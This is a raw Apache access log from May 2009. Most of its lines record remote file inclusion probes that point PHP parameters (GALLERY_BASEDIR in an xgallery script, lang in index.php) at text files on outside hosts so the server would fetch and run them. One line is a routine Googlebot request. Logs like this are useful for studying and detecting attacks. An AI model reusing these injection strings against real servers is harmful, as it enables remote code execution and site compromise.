122.116.178.20 - - [08/May/2009:00:23:52 -0400] "GET /logs/access_log.Q109041500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:23:54 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:23:54 -0400] "GET /logs/access_log.Q109041500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:00:24:24 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0094E8487E20E300C86C041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.254.231.239 - - [08/May/2009:00:24:58 -0400] "GET /logs/access_log.Q108052300%20%20/index.php?page=&lang=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:24:58 -0400] "GET /logs/access_log.Q108100700%20%20/index.php?page=&lang=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
